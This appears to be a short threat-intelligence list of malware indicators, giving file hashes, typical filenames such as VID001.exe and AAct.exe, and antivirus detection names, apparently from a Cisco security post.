Typical Filename: VID001.exe

Detection Name: W32.File.MalParent

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

Typical Filename: VID001.exe

Detection Name: Simple\_Custom\_Detection

SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c

MD5: a087b2e6ec57b08c0d0750c60f96a74c

Typical Filename: AAct.exe

Detection Name: W32.File.MalParent

SHA 256: 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645

MD5:  
2c8ea737a232fd03ab80db672d50a17a

Typical Filename: LwssPlayer.scr

Detection Name: Auto.125E12.241442.in02

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

Typical Filename: IMG001.exe

Detection Name: Trojan.GenericKD.33515991

Tag

#cisco